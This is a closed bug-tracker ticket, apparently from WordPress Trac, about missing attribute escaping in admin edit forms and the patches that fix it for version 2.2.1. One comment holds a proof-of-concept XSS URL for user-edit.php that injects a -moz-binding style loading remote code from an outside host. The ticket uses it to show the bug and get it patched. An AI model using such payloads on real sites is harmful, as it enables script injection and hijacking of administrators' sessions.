Ticket #4333 (closed defect (bug): fixed)
Some attribute_escape()s and relatives for edit forms
| Reported by: |
|
Owned by: |
|
|---|---|---|---|
| Priority: | high | Milestone: | 2.2.1 |
| Component: | Administration | Version: | 2.2 |
| Severity: | normal | Keywords: | |
| Cc: |
Description
Attachments
-
4333.diff
(19.3 KB) -
added by mdawaffe 5 years ago.
-
UserEdit_Fix_Trunk.patch
(653 bytes) -
added by g30rg3x 5 years ago.
- User-Edit.php Fix for trunk
-
Fix_22.patch
(17.5 KB) -
added by g30rg3x 5 years ago.
- Patch for milestone 2.2, based on trunk chageset #5543
Change History
The int casts can go in get_category_to_edit() and the other to_edit() functions since we always want them to be ints. attribute_escape() needs more context, so calling it from the forms is good.
- Owner changed from anonymous to rob1n
Also, looks like we could use some selected()'s in there.
- Status changed from new to closed
- Resolution set to fixed
Looks like those <select>'s options aren't going to work with selected().
comment:5
markjaquith — 5 years ago
- Status changed from closed to reopened
- Resolution fixed deleted
- Milestone changed from 2.3 to 2.2.1
Also needs to go into 2.2.1 and 2.0.11
comment:6
markjaquith — 5 years ago
comment:7
markjaquith — 5 years ago
2.2.1 remains.
Well i make some trunk based patches for 2.2.
Obviously i don't add anything that has to be related with the trunk version.
Also i think that the trunk solution is incomplete because doesn't filter the user-edit.php based version of the bug:
user-edit.php?user_id=1&wp_http_referer=%22style=-moz-binding:url(%22http://ha.ckers.org/xssmoz.xml%23xss%22)'
-
attachment
Fix_22.patch
added
Patch for milestone 2.2, based on trunk chageset #5543
- Owner changed from rob1n to anonymous
- Status changed from reopened to new
comment:10
markjaquith — 5 years ago
comment:11
markjaquith — 5 years ago
- Status changed from new to closed
- Resolution set to fixed
